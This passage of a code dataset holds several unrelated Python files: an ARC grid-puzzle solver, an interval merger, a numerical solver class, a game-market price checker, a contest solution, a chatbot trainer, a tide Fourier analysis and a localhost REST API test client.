sum(a.euclidean(b) for a, b in combinations(points, 2))\n\n\ndef find_transformation(target, reference):\n \"\"\"Finds a transformation of collection onto the points in the reference collection\"\"\"\n\n # Brute force search on all possible transformations\n for axis in (None, \"x\", \"y\", \"x=y\"):\n curr = target\n for degrees in (None, 90, 180, 270):\n if axis is not None:\n curr = curr.reflect(axis)\n if degrees is not None:\n curr = curr.rotate(degrees)\n\n # Find the reference points in target by matching them with the colors in the\n # reference collection\n target_reference = Collection([p for p in curr.points if p.color in reference.colors])\n\n # Apply the transformation of one point, to the rest of the points in the target collection\n corresponding = next(p for p in reference.points if p.color == target_reference.points[0].color)\n transformed = target_reference.translate(target_reference.points[0], corresponding)\n\n # If the resulting collection is identical to the reference point collection it is a match\n if transformed == reference:\n return curr.translate(target_reference.points[0], corresponding)\n\n return None\n\n\ndef solve_b782dc8a(X, wall=8):\n \"\"\"This task is very simple to solve as a human but harder to solve programmatically.\n\n The steps in my head for solving it are:\n 1. Identify the center point from which I would start the \"painting\".\n 2. Identify the second color in the every second one pattern judging it\n by the neighbouring cells that were not the colour of the wall.\n 3. Paint the background until I could not paint anymore.\n\n Algorithm:\n 1. The center point would be the only point with one color.\n 2. The pattern color would be the second least used color in the grid.\n 3. Painting is terminated when a wall is hit or the limits of the grid are reached.\n\n Tasks solved: All\n \"\"\"\n\n # Solution will be on a canvas identical to the input\n Y = X.copy()\n\n # Extract what is needed from the input\n X = Grid(X)\n colors = X.colors()\n # There will only be one center point, so only once cell will be colored\n # with the center color. Ideally there should be more than one outward points, otherwise\n # it is ambiguous which is the center. The code should work either way\n # by picking one at random if this happens.\n sorted_colors = sorted(colors.items(), key=lambda x: x[1])\n center_color, out_color = [c for c, _ in sorted_colors[:2]]\n center_point = X.get_points_by_color(center_color).points[0]\n color_transitions = {center_color: out_color, out_color: center_color}\n\n # Paint the pattern starting from the center point\n visited = np.zeros(X.arr.shape)\n paint(Y, (center_point.x, center_point.y), center_color, color_transitions, visited, wall)\n\n return Y\n\n\ndef paint(X, point, color, color_transitions, visited, wall):\n \"\"\"Recursively paints non-wall points starting from point by choosing the next color\n using the color_transitions dict. 
Points that are already visited are not re-painted.\n \"\"\"\n\n visited_mark = -1\n x, y = point\n\n stop_condition = (\n x == -1 or x == X.shape[0] or\n y == -1 or y == X.shape[1] or\n X[x][y] == wall or\n visited[x][y] == visited_mark\n )\n\n if not stop_condition:\n X[x][y] = color\n visited[x][y] = visited_mark\n for neighbour in ((x, y + 1), (x, y - 1), (x + 1, y), (x - 1, y)):\n paint(X, neighbour, color_transitions[color], color_transitions, visited, wall)\n\n\ndef solve_5ad4f10b(X, background=0):\n \"\"\"This task was not far off the difficulty of the first task done.\n It was mentioned as one of the examples provided. As a human it is very simple\n to solve but I struggled to come up with a pattern that was always true\n when differentiate which color was which.\n\n Note:\n All of the examples have an output of shape (3, 3) but as a human I would know how\n to solve the same problem with a (4, 4) or a (5, 5), etc. solution. I tried\n to make the code generalize to this.\n\n The steps in my head for solving it are:\n 1. Find the square of squares of equal size pattern.\n 2. Downscale the pattern so that each square is of size 1. Also change the color\n to the other color that is not the background.\n\n Algorithm:\n This one did not transfer as smoothly to the same steps when its solved programmatically,\n I will describe how the steps are achieved though:\n 1. This is handled by treating both colours as the color that contains the square of squares,\n some condition would fail in the process and nothing would be returned when the\n wrong color is attempted.\n 2. The size of each side would be the greatest common divisor of all the sides in the\n square of squares. Downscaling is done pretty much exactly as you would think,\n all squares are made a size of one.\n\n Tasks solved: All\n \"\"\"\n\n # Extract what is needed from the input\n X = Grid(X)\n colors = X.colors()\n del colors[background]\n\n # Get the bounding boxes of each unique color\n bounding_boxes = (Grid(X.get_points_by_color(c).asnumpy(background)) for c in colors.keys())\n\n for box, color in zip(bounding_boxes, colors.keys()):\n # Find adjacency collections for both the target color and the background\n targets = box.get_adjacency_collections(background, color)\n backgrounds = box.get_adjacency_collections(color, background)\n\n # The length of the sides of the squares will be the greatest common divisor\n # of all the sides in the square of squares\n sides = [t.shape[0] for t in targets] + [t.shape[1] for t in targets] + [box.arr.shape[0]]\n sides += [b.shape[0] for b in backgrounds] + [b.shape[1] for b in backgrounds]\n side = np.gcd.reduce(sides)\n\n # The fill color of the solution will be the only other color\n # (and not the background color)\n fill_color = next(c for c in colors.keys() if c != color)\n\n Y = downscale(box.arr, side, fill_color, background)\n if Y is not None:\n return Y\n\n\ndef downscale(box, side, fill_color, background):\n \"\"\"Downscales box by considering each box of length side as one pixel.\n If a downscaled pixel contains more than on color this returns None\"\"\"\n\n if side == 1:\n return None\n\n w, h = int(box.shape[0] / side), int(box.shape[1] / side)\n Y = np.full((w, h), background)\n\n for x in range(w):\n for y in range(h):\n square_color = get_square_color(box, x*side, y*side, side)\n if square_color is not None:\n if square_color != background:\n Y[x][y] = fill_color\n else:\n return None\n return Y\n\n\ndef get_square_color(box, x, y, side):\n \"\"\"Gets the color of the 
square with its top left corner at (x, y) and with the sides being a length of side\n Returns None if they are not all the same color or if side == 1\"\"\"\n\n colors = set()\n for i in range(side-1):\n for j in range(side-1):\n colors.add(box[x + i][y + j])\n if len(colors) == 1:\n return colors.pop()\n else:\n return None\n\n\n\ndef main():\n # Find all the functions defined in this file whose names are\n # like solve_abcd1234(), and run them.\n\n # regex to match solve_* functions and extract task IDs\n p = r\"solve_([a-f0-9]{8})\" \n tasks_solvers = []\n # globals() gives a dict containing all global names (variables\n # and functions), as name: value pairs.\n for name in globals(): \n m = re.match(p, name)\n if m:\n # if the name fits the pattern eg solve_abcd1234\n ID = m.group(1) # just the task ID\n solve_fn = globals()[name] # the fn itself\n tasks_solvers.append((ID, solve_fn))\n\n for ID, solve_fn in tasks_solvers:\n # for each task, read the data and call test()\n directory = os.path.join(\"..\", \"data\", \"training\")\n json_filename = os.path.join(directory, ID + \".json\")\n data = read_ARC_JSON(json_filename)\n test(ID, solve_fn, data)\n \ndef read_ARC_JSON(filepath):\n \"\"\"Given a filepath, read in the ARC task data which is in JSON\n format. Extract the train/test input/output pairs of\n grids. Convert each grid to np.array and return train_input,\n train_output, test_input, test_output.\"\"\"\n \n # Open the JSON file and load it \n data = json.load(open(filepath))\n\n # Extract the train/test input/output grids. Each grid will be a\n # list of lists of ints. We convert to Numpy.\n train_input = [np.array(data['train'][i]['input']) for i in range(len(data['train']))]\n train_output = [np.array(data['train'][i]['output']) for i in range(len(data['train']))]\n test_input = [np.array(data['test'][i]['input']) for i in range(len(data['test']))]\n test_output = [np.array(data['test'][i]['output']) for i in range(len(data['test']))]\n\n return (train_input, train_output, test_input, test_output)\n\n\ndef test(taskID, solve, data):\n \"\"\"Given a task ID, call the given solve() function on every\n example in the task data.\"\"\"\n print(taskID)\n train_input, train_output, test_input, test_output = data\n print(\"Training grids\")\n for x, y in zip(train_input, train_output):\n yhat = solve(x)\n show_result(x, y, yhat)\n print(\"Test grids\")\n for x, y in zip(test_input, test_output):\n yhat = solve(x)\n show_result(x, y, yhat)\n\n \ndef show_result(x, y, yhat):\n print(\"Input\")\n print(x)\n print(\"Correct output\")\n print(y)\n print(\"Our output\")\n print(yhat)\n print(\"Correct?\")\n # if yhat has the right shape, then (y == yhat) is a bool array\n # and we test whether it is True everywhere. 
if yhat has the wrong\n # shape, then y == yhat is just a single bool.\n print(np.all(y == yhat))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/manual_solve.py","file_name":"manual_solve.py","file_ext":"py","file_size_in_byte":25174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"69309125","text":"import unittest\n\ndef condense(arr):\n\tif arr is None:\n\t\treturn arr\n\t'''\n\t\tASSUMING THE INTERVAL IS COMPLETELY ENCLOSED/OVERLAPPED\n\t\t* What if (4,10), (5,12) --> would we say 4,12 or leave them separately?\n\t\tstart, end = 0, 0\n\t\ts, e = 1, 3\n\t\tif e < new_s\n\t\tappend s, e onto list\n\n\t\ts, e = 4, 10\n\t\tnew_s = 5\n\t\tnew_e = 8\n\t\tif e > new_e\n\t\t\tnext elm\t\t\n\t'''\n\tarr.sort()\n\tfixed = []\n\tfor s, e in arr:\n\t\tif not fixed:\n\t\t\tfixed.append((s,e))\n\t\tif s <= fixed[-1][1]:\n\t\t\tprev_s, prev_e = fixed[-1]\n\t\t\tfixed[-1] = (prev_s, max(prev_e, e))\n\t\telse:\n\t\t\tfixed.append((s,e))\n\treturn fixed\n\n\nclass Test(unittest.TestCase):\n\n\tdata = [([(1,3),(5,8),(4,10),(20,25)], [(1,3),(4,10),(20,25)])]\n\n\tdef test(self):\n\t\tfor case, expected in self.data:\n\t\t\tactual = condense(case)\n\t\t\tself.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Problem_77/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"204293956","text":"'''Finite difference solver'''\nimport numpy as np\nfrom .grid import Grid\nfrom .models.model import Model\nfrom .sinks.sink import Sink\n\n\nclass Solver(object):\n def __init__(self,\n simulation_times=[],\n reinitialization_iters=0,\n ):\n # Gettable variables\n self.simulation_times = simulation_times\n self._model = None\n self._grid = None\n self._reinitializer = None\n self._sinks = []\n self.reinitialization_iters = reinitialization_iters\n\n # Read-only variables\n self._elapsed_time = 0.0\n self._iterations = 0\n\n def simulate(self):\n if self.model is None:\n raise RuntimeError('No model has been set')\n if self.grid is None:\n raise RuntimeError('No grid has been set')\n if self._simulation_times == []:\n raise RuntimeError('No simulation times have been set')\n if self._simulation_times[0] != 0.0:\n self._simulation_times.insert(0, 0.0)\n\n # Initalize values\n self._elapsed_time = 0.0\n self._iterations = 0\n\n # Run all instant sinks initially\n for sink in self._sinks:\n sink(self.grid, self._elapsed_time)\n\n # While we do not halt\n while not self.halt():\n # Process the model\n self.model.process(self.grid)\n\n # Calculate dt\n dt = self.calculate_dt()\n\n # Perform grid update (TODO: Runge-Kutta)\n self.grid.data = self.grid.data - dt*self.model.H.data\n\n # Increment time\n self._elapsed_time += dt\n\n # Increment count\n self._iterations += 1\n\n # Run all instant sinks\n for sink in self._sinks:\n sink(self.grid, self._elapsed_time)\n\n # Reinitialization\n if self.reinitialization_iters != 0 \\\n and self.iterations % self.reinitialization_iters == 0 \\\n and self.reinitializer:\n self.reinitializer.grid = self.grid\n self.reinitializer.simulate()\n self.grid = self.reinitializer.grid\n\n def add_sink(self, new_sink):\n if not isinstance(new_sink, Sink):\n raise TypeError(\"Must provide wolff.sinks.sink.Sink subclass\")\n self._sinks.append(new_sink)\n\n def halt(self):\n return np.isclose(self.simulation_times[-1], self._elapsed_time) or \\\n 
self._elapsed_time > self.simulation_times[-1]\n\n def calculate_dt(self):\n\n for i in range(len(self._simulation_times)-1):\n if (self._elapsed_time >= self.simulation_times[i]) \\\n and (self._elapsed_time < self.simulation_times[i+1]):\n break\n\n dt = np.amin(np.array([\n self.model.dt,\n self._simulation_times[i+1] - self._elapsed_time]))\n\n return dt\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, value):\n if not isinstance(value, Model):\n raise TypeError(\"Must provide wolff.models.model.Model subclass\")\n self._model = value\n\n @property\n def grid(self):\n return self._grid\n\n @grid.setter\n def grid(self, value):\n if not isinstance(value, Grid):\n raise TypeError(\"Must provide wolff.grid.Grid subclass\")\n self._grid = value\n\n @property\n def reinitializer(self):\n return self._reinitializer\n\n @reinitializer.setter\n def reinitializer(self, value):\n if not isinstance(value, Solver):\n raise TypeError(\"Must provide wolff.solver.Solver subclass\")\n self._reinitializer = value\n\n @property\n def simulation_times(self):\n return self._simulation_times\n\n @simulation_times.setter\n def simulation_times(self, value):\n if type(value) is not list:\n value = [value]\n if any(n < 0 for n in value):\n raise ValueError(\"Cannot set simulation time to a negative number\")\n self._simulation_times = list(value)\n\n @property\n def reinitialization_iters(self):\n return self._reinitialization_iters\n\n @reinitialization_iters.setter\n def reinitialization_iters(self, value):\n if value < 0:\n raise ValueError(\"Cannot set reinitialization iterations to a\" +\n \" negative number\")\n self._reinitialization_iters = int(value)\n\n @property\n def iterations(self):\n return self._iterations\n\n @property\n def elapsed_time(self):\n return self._elapsed_time\n","sub_path":"wolff/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"327650114","text":"import requests\r\nimport re\r\nimport operator\r\nimport tkinter as tk\r\nimport time\r\n\r\nHeight = 300\r\nWidth = 500\r\npld_item = [31830, 31813]\r\nchest_items = [31868, 31832, 31862, 31850, 31856, 31844, 31838]\r\nfeet_items = [31853, 31859, 31847, 31835, 31841, 31871, 31865]\r\nhands_items = [31851, 31857, 31845, 31833, 31839, 31869, 31863]\r\nhead_items = [31831, 31861, 31837, 31867, 31849, 31855, 31843]\r\nleg_items = [31852, 31858, 31846, 31870, 31834, 31864, 31840]\r\nwaist_items = [31872, 31836, 31866, 31842, 31854, 31860, 31848]\r\nacc_items = [31885, 31887, 31883, 31886, 31884,\r\n 31875, 31877, 31873, 31876, 31874,\r\n 31880, 31882, 31878, 31881, 31879,\r\n 31890, 31892, 31888, 31891, 31889]\r\nweap_items = [31823, 31817, 31825, 31821,\r\n 31829,31819, 31828, 31816,\r\n 31820, 31815,31814, 31827,\r\n 31818, 31826, 31824,31822]\r\nitem_list = {\r\n}\r\nsearch = False\r\n\r\ndef api_grab(item_num):\r\n api_url = (\"https://universalis.app/api/Aether/\" + str(item_num))\r\n page = requests.get(api_url)\r\n page_data = page.json()\r\n refine1 = {key: page_data[key] for key in page_data.keys()\r\n & {\"listings\"}}\r\n\r\n for pro in refine1:\r\n new_dict = refine1[pro][4]\r\n refine2 = {key: new_dict[key] for key in new_dict.keys()\r\n & {\"pricePerUnit\"}}\r\n new1_entry = str(refine2)\r\n new2_entry = list(map(int, re.findall(r'\\d+', new1_entry)))\r\n new3_entry = new2_entry[0]\r\n return new3_entry\r\n\r\ndef search_best():\r\n i = 0\r\n while i < 
len(pld_item):\r\n item_num = (pld_item[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(chest_items):\r\n item_num = (chest_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 42)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(feet_items):\r\n item_num = (feet_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 33)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(hands_items):\r\n item_num = (hands_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 33)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(head_items):\r\n item_num = (head_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 33)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(leg_items):\r\n item_num = (leg_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 42)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(waist_items):\r\n item_num = (waist_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(acc_items):\r\n item_num = (acc_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n i = 0\r\n\r\n while i < len(weap_items):\r\n item_num = (weap_items[i])\r\n world_price = api_grab(item_num)\r\n item_list[int(item_num)] = int(world_price / 21)\r\n i = i + 1\r\n\r\n\r\n sorted_d = dict( sorted(item_list.items(), key=operator.itemgetter(1)))\r\n best_prices = list(sorted_d.items())[:15]\r\n T.insert(tk.END, (\"\\nThe Cheapest items in order\"))\r\n\r\n T.insert(tk.END, (\"\\nuniversalis.app/market/\" + str(best_prices[0]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[1]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[2]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[3]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: ')) + \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[4]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[5]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[6]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[7]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[8]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[9]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[10]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[11]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' 
PricePerToken: '))+ \\\r\n                  (\"\\nuniversalis.app/market/\" + str(best_prices[12]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n                  (\"\\nuniversalis.app/market/\" + str(best_prices[13]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n                  (\"\\nuniversalis.app/market/\" + str(best_prices[14]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))\r\n                  )\r\n\r\n\r\nroot = tk.Tk()\r\n\r\ncanvas = tk.Canvas(root, height=Height, width=Width)\r\ncanvas.pack()\r\n\r\nframe = tk.Frame(root)\r\nframe.place(relx=0.4, rely=0.05, relwidth=0.2, relheight=0.1)\r\n\r\nbox = tk.Text(root, bg=\"white\")\r\nbox.place(relx=0.1, rely=0.2, relwidth=0.8, relheight=0.7)\r\n\r\nS = tk.Scrollbar(root)\r\nT = tk.Text(root, height=10, width=50)\r\nS.config(command=T.yview)\r\nT.config(yscrollcommand=S.set)\r\nT.place(relx=0.1, rely=0.2, relwidth=0.8, relheight=0.7)\r\nS.place(relx=0.9, rely=0.2, relwidth=0.05, relheight=0.7)\r\n\r\nT.insert(tk.END, \"After clicking the button, please be patient\\nit may take some time to search all exarchic gear:\")\r\n\r\nbutton = tk.Button(frame, text=\"Show Best\", command=search_best)\r\nbutton.pack(expand=True, fill=\"both\")\r\n\r\nroot.mainloop()\r\n","sub_path":"Python Script not compiled/FFXIV Item Pricer v1.py","file_name":"FFXIV Item Pricer v1.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"287095551","text":"# https://atcoder.jp/contests/agc018/tasks/agc018_b\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda:sys.stdin.readline().rstrip()\ndef resolve():\n    n,m=map(int,input().split())\n    A=[list(map(lambda x:int(x)-1,input().split())) for _ in range(n)]\n    ans=INF\n\n    for _ in range(m):\n        C=[0]*m # counter for each sport\n        for i in range(n):\n            for j in range(m):\n                if(A[i][j] is not None):\n                    C[A[i][j]]+=1\n                    break\n        M=max(C)\n        ans=min(ans,M)\n        ind=C.index(M)\n        for i in range(n):\n            for j in range(m):\n                if(A[i][j]==ind):\n                    A[i][j]=None\n\n    print(ans)\nresolve()\n","sub_path":"AGC018/b_sports_festival.py","file_name":"b_sports_festival.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"74641358","text":"import jieba\nimport json\nimport numpy as np\nimport pickle\nimport random\nimport tensorflow as tf\nimport tflearn\n\nwith open('intents.json') as json_data:\n    intents = json.load(json_data)\n\nwords = []\nclasses = []\ndocuments = []\nignore_words = [\"?\", \"的\", \"。\", \"!\", \"你们\", \"是\", \"有\", \"吗\", \"我\", \"想\", \"我能\", \"不\", \"什么\", \"最\"]\nsuggest_words = [\"老板好\", \"下次见\"]\nfor word in suggest_words:\n    jieba.suggest_freq(word, True)\n\nfor intent in intents['intents']:\n    for phrase in intent['phrases']:\n        w = list(jieba.cut(phrase, cut_all=False))\n        words.extend(w)\n        documents.append((w, intent['intent']))\n        if intent['intent'] not in classes:\n            classes.append(intent['intent'])\n\nwords = [w for w in words if w not in ignore_words]\nwords = sorted(list(set(words)))\n\nclasses = sorted(list(set(classes)))\n\nprint(len(documents), \"documents\")\nprint(len(classes), \"classes\", classes)\nprint(len(words), \"words\", words)\n\ntraining = []\noutput = []\noutput_empty = [0] * len(classes)\n\nfor doc in documents:\n    bag = []\n    pattern_words = doc[0]\n    for w in words:\n        bag.append(1) if w in pattern_words else bag.append(0)\n\n
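    # Each training example pairs a multi-hot "bag of words" vector over the
    # segmented vocabulary (1 where the vocabulary word occurs in this phrase)
    # with the one-hot intent label built from `output_empty` below.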
    output_row = list(output_empty)\n    output_row[classes.index(doc[1])] = 1\n\n    training.append([bag, output_row])\n\nrandom.shuffle(training)\ntraining = np.array(training)\n\ntrain_x = list(training[:, 0])\ntrain_y = list(training[:, 1])\n\ntf.reset_default_graph()\nnet = tflearn.input_data(shape=[None, len(train_x[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(train_y[0]), activation='softmax')\nnet = tflearn.regression(net)\n\nmodel = tflearn.DNN(net, tensorboard_dir='saved/tflearn_logs')\nmodel.fit(train_x, train_y, n_epoch=1500, batch_size=5, show_metric=True)\nmodel.save('saved/model.tflearn')\n\npickle.dump({'words': words, 'classes': classes, 'train_x': train_x, 'train_y': train_y},\n            open(\"saved/training_data\", \"wb\"))\n","sub_path":"chatbot-2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"371060572","text":"import funciones as f\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\n#The goal of this exercise is to analyze sub-samples and process them according to a date range.\n#The date format is \nformat = \"%Y/%m/%d %H:%M\"\nfechas = [\n    {\"Descripcion\":\"First week of January\" ,\"sFechaInicio\":\"2019/01/01 00:00\",\"sFechaFin\":\"2019/01/07 23:00\"},\n    {\"Descripcion\":\"Second week of January\" ,\"sFechaInicio\":\"2019/01/08 00:00\",\"sFechaFin\":\"2019/01/14 23:00\"},\n    {\"Descripcion\":\"January and February\" ,\"sFechaInicio\":\"2019/01/01 00:00\",\"sFechaFin\":\"2019/03/01 00:00\"},\n    {\"Descripcion\":\"March and April\" ,\"sFechaInicio\":\"2019/01/01 00:00\",\"sFechaFin\":\"2019/03/01 00:00\"},\n]\n\n\n\nN_armonicos = 4\nfor fecha in fechas:\n    print(fecha)\n    mediciones_alturas = f.leer_archivo_maine(fecha[\"sFechaInicio\"],fecha[\"sFechaFin\"])['Verified (m)']\n    N_samples = int(len(mediciones_alturas))\n    tiempo = np.arange(N_samples)\n    mediciones_alturas_fft = f.fft_datos(mediciones_alturas)\n    W_samples = int(len(mediciones_alturas_fft))\n    omega = np.arange(W_samples) * (2*np.pi/N_samples)\n    freq = np.arange(W_samples) / N_samples\n    #Calculation for the 4 main harmonics\n    indices_armonicos = f.obtener_indices_armonicos(mediciones_alturas_fft,N_armonicos)\n    serie_fourier_alturas = f.sf_altura(mediciones_alturas_fft,tiempo,indices_armonicos)\n    ecm_n = f.ECM(serie_fourier_alturas,mediciones_alturas)\n    print(\"The frequencies used are:\",freq[indices_armonicos])\n    print(\"The MSE for the date range from \"+fecha[\"sFechaInicio\"]+\" to \"+fecha[\"sFechaFin\"]+\" with \"+str(N_armonicos)+\" harmonics is: \",ecm_n)\n    #Calculation for the 3 main harmonics\n    indices_armonicos = f.obtener_indices_armonicos(mediciones_alturas_fft,N_armonicos-1)\n    serie_fourier_alturas = f.sf_altura(mediciones_alturas_fft,tiempo,indices_armonicos)\n    ecm_n = f.ECM(serie_fourier_alturas,mediciones_alturas)\n    print(\"The MSE for the date range from \"+fecha[\"sFechaInicio\"]+\" to \"+fecha[\"sFechaFin\"]+\" with \"+str(N_armonicos-1)+\" harmonics is: \",ecm_n)\n    \n\n\n","sub_path":"Informe/T`P1_86559_88019/tp1_ejercicio_d.py","file_name":"tp1_ejercicio_d.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"127162096","text":"import requests as rq\r\nimport re\r\n\r\nprefix = 'http://127.0.0.1:5000'\r\n
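# Aside (illustrative, not part of the original script): the `requests` library
# already exposes the HTTP verb on the prepared request, so the regex parsing
# inside print_response() below could be replaced by a plain attribute lookup:
#
#     r = rq.get(prefix + '/user/document/75')
#     print(r.request.method)  # -> 'GET'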
\r\ndef print_response(response, body=None):\r\n    print('Request:')\r\n    print('\\tUrl: {}'.format(response.url))\r\n    print('\\tMethod: {}'.format(re.search(r\"\\[(\\w+)\\]\", str(response.request)).group(1)))\r\n    print('\\tBody: {}'.format(body))\r\n    print('Response:')\r\n    print('\\tCode: {}'.format(response.status_code))\r\n    content = response.content.decode(\"utf-8\")\r\n\r\n    if len(content) > 200:\r\n        content = content[:160] + \"...\" + content[-38:]\r\n    print('\\tContent: {}'.format(content), end='')\r\n    print('\\tHeaders: {}'.format(response.headers))\r\n    print('-' * 30)\r\n\r\ndef send_get(message, url):\r\n    print(message)\r\n    url = prefix + url\r\n    response = rq.get(url)\r\n    print_response(response)\r\n\r\ndef send_post(message, url, body=None):\r\n    print(message)\r\n    url = prefix + url\r\n    response = rq.post(url, json=body)\r\n    print_response(response, body)\r\n\r\ndef send_put(message, url, body=None):\r\n    print(message)\r\n    url = prefix + url\r\n    if body is None:\r\n        response = rq.put(url)\r\n        print_response(response, body)\r\n    else:\r\n        response = rq.put(url, data=body, headers={\"Content-Type\": \"application/json\"})\r\n        print_response(response, body)\r\n\r\ndef send_delete(message, url):\r\n    print(message)\r\n    url = prefix + url\r\n    response = rq.delete(url)\r\n    print_response(response)\r\n\r\n# ------ Simple operations ------\r\nsend_get('Document for user with ID = 75', '/user/document/75')\r\nsend_get('Non existing user document', '/user/document/0')\r\nsend_get('Document for movie with ID = 3', '/movie/document/3')\r\nprint(\"----------------------------------------------\")\r\n# # # #------ Preselection ------\r\nsend_get('Preselection for user 75', '/user/preselection/75')\r\nsend_get('Preselection for movie 3', '/movie/preselection/3')\r\nprint(\"----------------------------------------------\")\r\n# # ------ Add/Update/Delete ------\r\nsend_put('Add new movie document number 80000 that nobody likes', '/movie/document/80000', '[]')\r\nsend_put('Add new movie document number 80001 that nobody likes', '/movie/document/80001', '[]')\r\nsend_put('Add new movie document number 80002 that nobody likes', '/movie/document/80002', '[]')\r\nprint(\"----------------------------------------------\")\r\nsend_put('Add new user document number 90000, who likes movies 80000 and 80001',\r\n'/user/document/90000', '[80000, 80001]')\r\nsend_get('Get new user 90000 document', '/user/document/90000')\r\nsend_get('Get updated movie 80000 document', '/movie/document/80000')\r\nsend_get('Get updated movie 80001 document', '/movie/document/80001')\r\nprint(\"----------------------------------------------\")\r\nsend_post('Update user 90000, that he now likes movies 80000 and 80002', '/user/bulk',\r\n[{\"user_id\": 90000, \"liked_movies\": [80000, 80002]}])\r\nsend_get('Get updated user 90000 document', '/user/document/90000')\r\nsend_get('Get updated movie 80000 document', '/movie/document/80000')\r\nsend_get('Get updated movie 80001 document', '/movie/document/80001')\r\nsend_get('Get updated movie 80002 document', '/movie/document/80002')\r\nprint(\"----------------------------------------------\")\r\nsend_delete('Remove user document number 90000', '/user/document/90000')\r\nsend_get('Get updated movie 80000 document', '/movie/document/80000')\r\nsend_get('Get updated movie 80001 document', '/movie/document/80001')\r\nsend_get('Get updated movie 80002 document', '/movie/document/80002')\r\nsend_delete('Remove movie document number 80000', '/movie/document/80000')\r\nsend_delete('Remove movie document number 80001', '/movie/document/80001')\r\nsend_delete('Remove movie document number 80002', '/movie/document/80002')
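# A possible extension (a sketch, not part of the original client): reusing one
# TCP connection via requests.Session() speeds up long call sequences like the
# ones above. The base_url default mirrors `prefix` and is otherwise an assumption.
import requests

def make_session_sender(base_url='http://127.0.0.1:5000'):
    session = requests.Session()  # keeps the HTTP connection alive between calls
    def send(method, path, **kwargs):
        # session.request reuses the underlying connection across calls
        return session.request(method, base_url + path, **kwargs)
    return send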
","sub_path":"wtiproj07_api_client.py","file_name":"wtiproj07_api_client.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
